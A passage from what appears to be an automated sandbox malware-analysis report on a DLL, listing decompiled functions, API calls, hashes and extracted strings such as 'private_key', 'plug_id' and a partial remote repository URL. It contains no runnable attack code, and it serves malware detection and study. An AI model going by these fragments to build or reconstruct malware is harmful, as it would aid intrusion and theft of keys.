                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _free.LIBCMT ref: 10034384
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap_free_malloc
                                                      • String ID:
                                                      • API String ID: 1020059152-0
                                                      • Opcode ID: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
                                                      • Instruction ID: bb9a3691e4910ddf3f97fd95c6fed46118ceeaa6e102d9eb0dcd454a9ff698ef
                                                      • Opcode Fuzzy Hash: d07b2b7aa13eb9e1607cb20442737d13e92e30ae166e89c69003bc223c206e31
                                                      • Instruction Fuzzy Hash: 2011A739905626EFDB23EF749C4564A77D4FF002A3F128535F9489F151DF70A9408A90
                                                      APIs
                                                      • __calloc_crt.LIBCMT ref: 100368B4
                                                      • CreateThread.KERNEL32(7591E010,?,100369EA,00000000,?,10023790), ref: 100368F8
                                                      • GetLastError.KERNEL32(?,?,00000000,?,10022663,00000000,00000000,10023790,?,00000000,00000000,?,7591E010), ref: 10036902
                                                      • _free.LIBCMT ref: 1003690B
                                                      • __dosmaperr.LIBCMT ref: 10036916
                                                        • Part of subcall function 10037F1F: __getptd_noexit.LIBCMT ref: 10037F1F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                      • String ID:
                                                      • API String ID: 2664167353-0
                                                      • Opcode ID: 0aa5bc5dc75a9b31d5b1c3d2b4f669a46dcce3f01b27eb34bd993268152f2fdf
                                                      • Instruction ID: 5cb67746c8deb3b6908984522394d369b9fd44db8d44f232a0760157a2382a7a
                                                      • Opcode Fuzzy Hash: 0aa5bc5dc75a9b31d5b1c3d2b4f669a46dcce3f01b27eb34bd993268152f2fdf
                                                      • Instruction Fuzzy Hash: D211C836204706AFE712DFA5DC41E9B3BD8EF496A6F21452AF918CE152EF31E8118760
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001B9D4
                                                        • Part of subcall function 10015FD9: char_traits.LIBCPMT ref: 10015FF2
                                                      • LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
                                                      • char_traits.LIBCPMT ref: 1001BA3C
                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Localchar_traits$AllocByteCharFreeH_prologMultiWide
                                                      • String ID:
                                                      • API String ID: 3955896064-0
                                                      • Opcode ID: 07706e345a344bd4d6aac4436143f3a5e68c24b416f2c0d5e3bd243b5069f4fd
                                                      • Instruction ID: 4a6ce25186c6130df069cdcea66e34867a326c7206a802e54ae00b1d56e6594d
                                                      • Opcode Fuzzy Hash: 07706e345a344bd4d6aac4436143f3a5e68c24b416f2c0d5e3bd243b5069f4fd
                                                      • Instruction Fuzzy Hash: 9211EDB1A00314AFEB10DFA99C95B6FBBB8FF44350F50052AF606E7281CB70DE448A61
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100174D2
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 100174E4
                                                        • Part of subcall function 10032521: __lock.LIBCMT ref: 10032532
                                                      • std::exception::exception.LIBCMT ref: 1001752B
                                                        • Part of subcall function 10035843: std::exception::_Copy_str.LIBCMT ref: 1003585C
                                                      • __CxxThrowException@8.LIBCMT ref: 10017540
                                                        • Part of subcall function 100374AB: RaiseException.KERNEL32(?,?,100324BA,?,?,?,?,?,100324BA,?,1005F454,100065DE), ref: 100374FC
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10017549
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
                                                      • String ID:
                                                      • API String ID: 3430881366-0
                                                      • Opcode ID: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
                                                      • Instruction ID: 2e25aa19e792d692cfb8a749acde735e181f8864b27ee24d0f24afe00c039543
                                                      • Opcode Fuzzy Hash: d6a2380a438230f467dc9b6f5abf8cdf1449d0574d5a5743862a8377094055bd
                                                      • Instruction Fuzzy Hash: 4C115EB5801B84DEC721CFA9C48058FFBF4FF18240B90892FE49AD3A01D734A649CBA5
                                                      APIs
                                                      • __time64.LIBCMT ref: 1001C0CD
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1001C0DF
                                                      • _rand.LIBCMT ref: 1001C0F0
                                                      • _rand.LIBCMT ref: 1001C100
                                                      • _rand.LIBCMT ref: 1001C10D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2467205089-0
                                                      • Opcode ID: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
                                                      • Instruction ID: 498d4cc3d495996ae9654b980ead4bc9d5abdff1964c0139d70e9de98c3e814c
                                                      • Opcode Fuzzy Hash: 85291bb48af480fafd9442eab0fdbe79dcb2487f13a4d34283cf0040ea608ccf
                                                      • Instruction Fuzzy Hash: 57F0B46F7C530428E112A1B66883F9B5386C7922B2F62442AFA005D0834CEBFC971171
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • __amsg_exit.LIBCMT ref: 100434B4
                                                      • __lock.LIBCMT ref: 100434C4
                                                      • InterlockedDecrement.KERNEL32(?), ref: 100434E1
                                                      • _free.LIBCMT ref: 100434F4
                                                      • InterlockedIncrement.KERNEL32(02E79C38), ref: 1004350C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 1231874560-0
                                                      • Opcode ID: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
                                                      • Instruction ID: 1a676bcf710e47d28fb425a3ba0c93491637c3a6279d9b895e8767c0b2df3840
                                                      • Opcode Fuzzy Hash: 30783ecee63b859ae03d249e61e977a37b21bf0c85f4d24dd4a4fcbf5da3e8a6
                                                      • Instruction Fuzzy Hash: 4B01C835901B21DBEB12DB618842B8DB3A0FF44772F25A125E805EB6D1CB747940CBD5
                                                      APIs
                                                      • __time64.LIBCMT ref: 10029187
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 100291A0
                                                      • _rand.LIBCMT ref: 100291B3
                                                      • _rand.LIBCMT ref: 100291C5
                                                      • _rand.LIBCMT ref: 100291D2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2467205089-0
                                                      • Opcode ID: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
                                                      • Instruction ID: 49897373e2c5e09ab42bbc18d07cd4d3912f03337949244e259c9962823e8d3a
                                                      • Opcode Fuzzy Hash: c968f277d0f78b788435681ff016cffce340b1874899cb01f81134d615aae11b
                                                      • Instruction Fuzzy Hash: E0F0507E7853024AD311D16268C6BD72387CBD2392FD10429BE055D043CC9F7C2B6176
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001C593
                                                        • Part of subcall function 1001C50D: __EH_prolog.LIBCMT ref: 1001C512
                                                        • Part of subcall function 1001C492: __EH_prolog.LIBCMT ref: 1001C497
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: @$djsonapi.cpp$e/jsonAPP/raw/master/rai
                                                      • API String ID: 3519838083-2556513634
                                                      • Opcode ID: da7ad3d737f3b97ad4cbae45dbeedb0bf1bde31c9bd59e9c61a6615254f2a7dc
                                                      • Instruction ID: e35286a00a694312397edf4dac3263dee23b3cda9c5dec8b5405504b628cfc74
                                                      • Opcode Fuzzy Hash: da7ad3d737f3b97ad4cbae45dbeedb0bf1bde31c9bd59e9c61a6615254f2a7dc
                                                      • Instruction Fuzzy Hash: EAB17D7590538DDEEB01CFE8C8A1BEDBBB4EF56340F244059D545AB283E734AA4ACB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_free
                                                      • String ID: 123
                                                      • API String ID: 271808718-2286445522
                                                      • Opcode ID: 3531562bc7174fe7f0065638616dd3700cce6067d64214d7c1095c229802346a
                                                      • Instruction ID: ff623e6fd29356da03f94aa7efefbc839a7b4de60313e6bc85451b60669c9f62
                                                      • Opcode Fuzzy Hash: 3531562bc7174fe7f0065638616dd3700cce6067d64214d7c1095c229802346a
                                                      • Instruction Fuzzy Hash: CC616975900209AFDB15CFA4C885BEEF7B5FF14340F10426EE00AA7156DB70AE89CBA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: data$msg$res
                                                      • API String ID: 3519838083-3980117613
                                                      • Opcode ID: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
                                                      • Instruction ID: ca96f964450022b4ce825e2093a35d337ed43a8c942eac252b94f1a881985688
                                                      • Opcode Fuzzy Hash: 639c7fa742343cc957440622c82f50c4dc46beb9c5a8af481b02dc0626dc696f
                                                      • Instruction Fuzzy Hash: 36519035800259DFDB01CFA4C891BEEB7B4EF15394F128169E81A7B191EB70BA88CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: device$plug_id$start
                                                      • API String ID: 3519838083-2830589257
                                                      • Opcode ID: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
                                                      • Instruction ID: 61eb8341c66f9c1c37179d96dec97e96f165e86e955c115b352dda1f94a7ecc4
                                                      • Opcode Fuzzy Hash: e44a6e828e21c30134f211eeb5f4d4cf6651ae1a0eb397ebc608cd26752bb1b4
                                                      • Instruction Fuzzy Hash: DA415176900169DFEB01CF94C861AEE73B4FF15390F064129ED86A7159DB74BE44CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: private_key$res$uid
                                                      • API String ID: 3519838083-3738858810
                                                      • Opcode ID: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
                                                      • Instruction ID: 0cf17efe025f2ff022da59414d9263fdb3e23aa0c70f559fd6cd2d39d45429a1
                                                      • Opcode Fuzzy Hash: cd588a721d36235ec090437caf60968450bd490db07ae58f426048e61703a1e6
                                                      • Instruction Fuzzy Hash: C0419D76800568EFDB01CFD9C851AEEB3B4FF05390F018129E856AB145EB70BE88CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_sprintf
                                                      • String ID: device$version
                                                      • API String ID: 1907722333-3297806232
                                                      • Opcode ID: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
                                                      • Instruction ID: f25d236ea6f9278581fcfa21b551091c7206b5ca2dc78d628d144162d2d67334
                                                      • Opcode Fuzzy Hash: c444afb1065a848e864711c5baf8a15f5b3e0c74e49889477f4c9a2eee4a49fc
                                                      • Instruction Fuzzy Hash: 6341737680015DAFEB01CFE4C851AEE77B8FF05390F114129E945A7145D774AB88CB90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: string too long
                                                      • API String ID: 4104443479-2556327735
                                                      • Opcode ID: da4230c6e38f331946945dc2367437a744eab73af8de7dbe5edd4ac9c8566102
                                                      • Instruction ID: fa3cd2dc3d769f6888f7928de3acb5536cb6e3c99d1e7fc2bdd3fd91821b90be
                                                      • Opcode Fuzzy Hash: da4230c6e38f331946945dc2367437a744eab73af8de7dbe5edd4ac9c8566102
                                                      • Instruction Fuzzy Hash: 66317131700700DBEB36DE58D844957B7BEEB45680B10891DE8A28B28AD771E945CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_free
                                                      • String ID: device
                                                      • API String ID: 271808718-154121870
                                                      • Opcode ID: ae67f1c37a1b86e07fb64e567300a05cac03445ac227f2bae7b17e01d95922c8
                                                      • Instruction ID: 8b352d68cf92191ed834dfb9f3932a70d875671965cf77d54b86c3eaa2099a4a
                                                      • Opcode Fuzzy Hash: ae67f1c37a1b86e07fb64e567300a05cac03445ac227f2bae7b17e01d95922c8
                                                      • Instruction Fuzzy Hash: 5C3159B5900258EEEB05DFA4C845BEDFBB8FF55340F50406AE0466B296DBB42F84CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10012472
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10008F12: __EH_prolog.LIBCMT ref: 10008F17
                                                      • _free.LIBCMT ref: 10012546
                                                      • _free.LIBCMT ref: 10012558
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
